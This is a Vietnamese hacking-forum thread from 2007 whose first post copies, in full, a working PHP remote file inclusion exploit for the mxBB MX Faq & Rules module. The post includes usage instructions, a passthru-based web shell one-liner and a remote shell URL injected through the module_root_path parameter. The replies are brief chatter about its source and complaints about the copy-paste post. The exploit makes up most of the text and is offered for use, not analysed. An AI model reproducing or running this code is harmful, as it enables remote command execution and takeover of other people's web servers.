[Question] Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm |
05/05/2007 06:52:40 (+0700) | #1 | 57199 |
|
vippro123
Locked
|
0 |
|
|
Joined: 22/03/2007 18:15:50
Messages: 111
Location: HuẾ MộNg mơ
Offline
|
|
#!/usr/bin/php -q -d short_open_tag=on
<?
print '
mxBB Module MX Faq & Rules <= 2.0.0 (faq.php) Remote File Include Exploit
[Vendor: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=371
Bug found and Exploit by bd0rk from SOH-Crew
Website1: www.hackschool.dl.am
Website2: www.soh-crew.it.tt
Contact: bd0rk@hackermail.com
Coded by bd0rk
';
if ($argc<4) {
print ('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host shell cmd OPTIONS
host: script server (ip/hostname)
shell: path to shell (<?passthru($_GET[cmd]);?>
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"bd0rk from Germany search exploits just for fun";ini_set("max_execution_time",0);echo "hauru";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$shell=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p='http://'.$host.':'.$port;}
$packet ="GET ".$p."faq.php?module_root_path=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"hauru"))
{
$temp=explode("hauru",$html);
die($temp[1]);
}
echo "Error";
?>
# vnsecurity.com [2007-05-02] |
|
|
|
|
[Question] Re: Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm |
15/05/2007 04:21:04 (+0700) | #2 | 59160 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Hừm... lấy từ milw0rm mà sao lại để # vnsecurity.com [2007-05-02] là sao? |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Question] Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm |
15/05/2007 07:29:41 (+0700) | #3 | 59195 |
|
phonglanbiec
Member
|
0 |
|
|
Joined: 03/07/2006 20:56:00
Messages: 162
Offline
|
|
Cái code tự động cập nhật những bài viết từ MilW0rm của VNSecurity.com, chắc khi copy vippro123 copy hết, không sàng lọc. |
|
|
|
|
[Question] Re: Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm |
25/06/2007 08:34:42 (+0700) | #4 | 66761 |
|
vippro123
Locked
|
0 |
|
|
Joined: 22/03/2007 18:15:50
Messages: 111
Location: HuẾ MộNg mơ
Offline
|
|
có bác nào hiểu đoạn code nói gì ko,giải thích giùm em cái |
|
|
|
|
[Question] Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm |
25/06/2007 12:37:19 (+0700) | #5 | 66829 |
|
K4i
Moderator
|
Joined: 18/04/2006 09:32:13
Messages: 635
Location: Underground
Offline
|
|
Ack! Code PHP mà, chịu khó đọc kĩ đi. (Lúc đầu nhìn lướt cứ tưởng perl :mrgreen |
|
Sống là để không chết chứ không phải để trở thành anh hùng |
|
[Question] Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm |
26/06/2007 12:19:16 (+0700) | #6 | 67061 |
|
hakuso
HVA Friend
|
Joined: 04/01/2004 13:28:06
Messages: 287
Location: làng Đo Đo
Offline
|
|
Code:
#!/usr/bin/php -q -d short_open_tag=on
Nhìn vào cái này thì chú nào muốn chạy thử chắc phải học chút ít Linux, ít ra là LiveCD :p |
|
Live, fight, work and study |
|
[Question] Mã khai thác lỗ hổng bảo mật cập nhập từ Milw0rm |
30/06/2007 05:32:53 (+0700) | #7 | 67820 |
|
phstiger
Member
|
0 |
|
|
Joined: 23/01/2007 17:47:26
Messages: 261
Offline
|
|
Theo mình nghĩ nội dung topic này rất thừa. Đặt tiêu đề và nội dung copy từ 1 site khác đặt vào, và chẳng có hướng dẫn hay thảo luận hỏi hang jì cả... |
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|